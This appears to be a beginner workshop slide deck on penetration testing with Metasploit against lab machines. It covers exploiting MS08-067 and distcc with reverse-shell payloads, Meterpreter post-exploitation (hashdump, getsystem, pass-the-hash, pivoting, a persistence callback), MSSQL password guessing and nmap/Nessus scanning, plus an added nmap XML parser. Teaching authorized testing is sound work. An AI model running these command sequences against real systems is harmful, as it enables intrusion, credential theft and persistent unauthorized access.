Metasploit for Penetration Testing: Beginner Class

Georgia Weidman, Information Security Consultant

Penetration Testing with Metasploit
Georgia Weidman
Acknowledgements
•   Metasploit Team
•   Offensive Security/Metasploit Unleashed
•   Hackers for Charity
•   David Kennedy
•   BSides Delaware Crew
•   Darren
Agenda
• Metasploit Basics
  – Some terminology/brief intro to pentesting
  – How Metasploit works
  – Interacting with Metasploit
• Basic Exploitation
  – Exploiting a vulnerability using Metasploit console
• Using Meterpreter
  – Using the Meterpreter shell for post exploitation
Agenda
• Metasploit in a penetration test
  – Information Gathering
  – Vulnerability Scanning
  – Exploitation in depth
  – Post exploitation
  – Reporting
• Hack some stuff
  – Pop my boxes
Connecting
Wireless access point SSID IgnatiusRiley
Password: metasploit
What’s in the lab?
• Windows XP SP2
  – IP address: 192.168.20.22
• Ubuntu Linux 8.04 (Metasploitable)
  – IP address: 192.168.20.23
Others below .100 (.100 and above are you guys)
What is Penetration Testing?
Simulation of a real attack
Get out of jail free card for exploiting systems
Report to customers with findings and recommendations
Find and remediate vulnerabilities before attackers exploit them
What is Metasploit?
Exploitation framework
Ruby based
Modular
Exploits, payloads, auxiliaries, and more
Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
Metasploit Interfaces
Msfconsole
Msfcli
Msfweb, Msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
Exploitation Streamlining
• Traditional Pentest:
  – Find public exploit
  – Change offsets and return address for your target
  – Replace shellcode
• Metasploit:
  – Load Metasploit module
  – Select target OS
  – Set IP addresses
  – Select payload
Using Msfconsole: Exploitation
use <module> - sets the exploit/auxiliary/etc. module to use
set <option> <value> - set a parameter
setg <option> <value> - set a parameter globally
show <x> - lists all available x (payloads, options, targets, ...)
exploit - runs the selected module
Windows Exploitation Example
search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set rhost 192.168.20.22 (the Windows XP target; set lhost to your IP and any other options as well)
exploit
MSFcli Exploitation Example
./msfcli <exploit> <option=x> E
Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E
E = exploit
O = show options
P = show payloads
Linux Exploitation Example
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (your ip)
exploit
Sessions
sessions -l lists all active sessions
sessions -i <id> interact with a given session
Meterpreter
Gain a session using a meterpreter payload
Memory based/never hits the disk
Everything a shell can do plus extra
Meterpreter Commands
help - shows all available commands
background - backgrounds the session
ps - shows all processes
migrate <process id> - moves meterpreter to another process
getuid - shows the user
Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> - pushes a file to the victim
hashdump - dumps the password hashes from the SAM
shell - drops you in a shell
Exercise
In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.
Experiment with different payloads and meterpreter commands.
Information Gathering
Learning as much about a target as possible
Examples: open ports, running services, installed software
Identify points for further exploration
Metasploit and Databases
Metasploit supports MySQL and PostgreSQL
/etc/init.d/postgresql-8.4 start (starts PostgreSQL)
msf > db_connect postgres:password@127.0.0.1/metasploit (connects to the database server and creates the database metasploit)
Portscanning
Queries a host to see if a program is listening
Ex: Browsing to a website - the webserver listens on port 80
Listening ports are accessible by an attacker and if vulnerable may be used for exploitation
Ex: ms08_067_netapi exploits SMB on port 445
Metasploit and nmap
Port scanning and just about everything else
http://nmap.org/ and man nmap
Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan of hosts 192.168.20.20 through .99, outputs all formats with filenames beginning with subnet1)
msf > db_import subnet1.xml
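What db_import actually pulls out of subnet1.xml is the host and service inventory; the parser below, added here as an example and not part of the deck or of Metasploit, reads a constructed nmap -oA style XML file with Python's standard library and then answers the two questions the database slides ask later (services -s style search, and which hosts expose the ports this class uses, 445 for SMB and 3632 for distcc). The port-to-note mapping is my own reviewer's checklist, not nmap output.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample in the shape nmap writes for `-oA subnet1` (subnet1.xml).
# Hosts, products and versions are made up; they mirror the lab layout only.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV 192.168.20.20-99 -oA subnet1">
  <host>
    <status state="up"/>
    <address addr="192.168.20.22" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.20.23" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="3632"><state state="open"/><service name="distccd" product="distccd" version="v1"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.20.24" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


@dataclass
class Service:
    port: int
    proto: str
    name: str
    product: str
    version: str


@dataclass
class Host:
    address: str
    services: list = field(default_factory=list)


def parse_nmap_xml(xml_text):
    """Return the hosts that were up, each with its open ports only.

    This is the subset db_import records as hosts/services rows: closed or
    filtered ports and hosts that were down are dropped.
    """
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = None
        for a in h.findall("address"):
            if a.get("addrtype") in ("ipv4", "ipv6"):
                addr = a.get("addr")
                break
        if addr is None:
            continue
        host = Host(address=addr)
        ports = h.find("ports")
        for p in ([] if ports is None else ports.findall("port")):
            st = p.find("state")
            if st is None or st.get("state") != "open":
                continue
            svc = p.find("service")
            attr = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            host.services.append(Service(int(p.get("portid")), p.get("protocol"),
                                         attr("name"), attr("product"), attr("version")))
        hosts.append(host)
    return hosts


def search_services(hosts, needle):
    """Case-insensitive match on service name or product, like `services -s <string>`."""
    needle = needle.lower()
    return [(h.address, s.port) for h in hosts for s in h.services
            if needle in s.name.lower() or needle in s.product.lower()]


# Ports the deck singles out: 445 (SMB, ms08_067_netapi) and 3632 (distcc,
# distcc_exec). My own checklist for a defender reviewing the scan, not nmap data.
WATCHED_PORTS = {445: "SMB exposed: confirm MS08-067 patch level",
                 3632: "distcc exposed: should not be reachable from this network"}


def exposure_report(hosts):
    """List (address, port, note) for every open TCP port on the watch list."""
    return [(h.address, s.port, WATCHED_PORTS[s.port]) for h in hosts
            for s in h.services if s.proto == "tcp" and s.port in WATCHED_PORTS]


if __name__ == "__main__":
    for addr, port, note in exposure_report(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print(f"{addr}:{port}  {note}")
```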
MSF Auxiliary Portscanners
msf > search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP syn scan)
Use auxiliary modules like exploits (use, set, exploit, etc.)
Some Other MSF Scanners
scanner/smb/smb_version (scans port 445 for the SMB version, a good way to get the OS version)
scanner/ssh/ssh_version (queries the SSH version)
scanner/ftp/anonymous (anonymous FTP login)
Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: the SMB version scan in information gathering returned port 445 open and the target as Windows XP SP2, so scan for the ms08_067_netapi vulnerability
Metasploit and Nessus
Tenable's Vulnerability Scanner (http://www.nessus.org)
msf > load nessus
msf > nessus_connect student1:password@192.168.20.103 ok (ok says no SSL is ok)
msf > nessus_policy_list
msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
msf > nessus_report_list
msf > nessus_report_get <report id>
Metasploit Vulnerability Scanners
SMB Login
  Given a set of credentials, what systems can they access?
  scanner/smb/smb_login
Open VNC and X11
  If misconfigured, may be accessible without credentials
  scanner/vnc/vnc_none_auth
  scanner/x11/open_x11
Using Msfconsole: Exploitation
use <module> - sets the exploit/auxiliary/etc. module to use
set <option> <value> - set a parameter
setg <option> <value> - set a parameter globally
show <x> - lists all available x (payloads, options, targets, ...)
exploit - runs the selected module
Our Database
hosts
services
vulns
-c select columns
-s search for a specific string
db_autopwn
By default just runs all the exploits that match a given open port
Not stealthy
Using vulnerability data it can be made smarter: matches vulnerabilities instead of ports
db_autopwn -x -e
Attacking MSSQL
The MSSQL TCP port can change; the UDP port is 1434
msf > search mssql (shows all MSSQL modules)
msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including the TCP port)
msf > use scanner/mssql/mssql_login (tries passwords to log into MSSQL)
msf > use windows/mssql/mssql_payload (logs into MSSQL and gets a shell)
We have a shell, now what?
Privilege escalation
Local information gathering
Exploiting additional hosts
Maintaining access
Forensic avoidance
Meterpreter: Privilege Escalation
A session has the privileges of the exploited process
getuid (tells you what user your session is running as)
getsystem (tries various techniques to escalate privileges)
Meterpreter: Enabling Remote Desktop
Turn on remote desktop, get it through the firewall, put a user in the Remote Desktop Users group
run getgui -e
Meterpreter: Migrating
If the process that hosts meterpreter closes, meterpreter dies too
Example: a client side exploit residing in the browser
meterpreter > ps (shows all processes)
meterpreter > migrate <process id> (moves to a new process)
Meterpreter: Searching for Content
Look for specific interesting files on the exploited system
search -h
Example: search -f *.jpg (finds all the porn)
Pivoting
Scenario: Exploit a dual-homed host with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)
Now you can portscan, exploit, etc. the non-routable subnet
PSExec
hashdump (dumps the hashes, not always easy to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
Meterpreter: Persistence
The persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, at a 5 second interval, on port 443, to IP 192.168.20.101)
Exercises
Perform a penetration test on the Windows and Linux systems we used in class
Perform a penetration test on the lab network
Contact
Georgia Weidman
Website: http://www.grmn00bs.com
http://www.georgiaweidman.com
Email: georgia@grmn00bs.com
Twitter: @vincentkadmon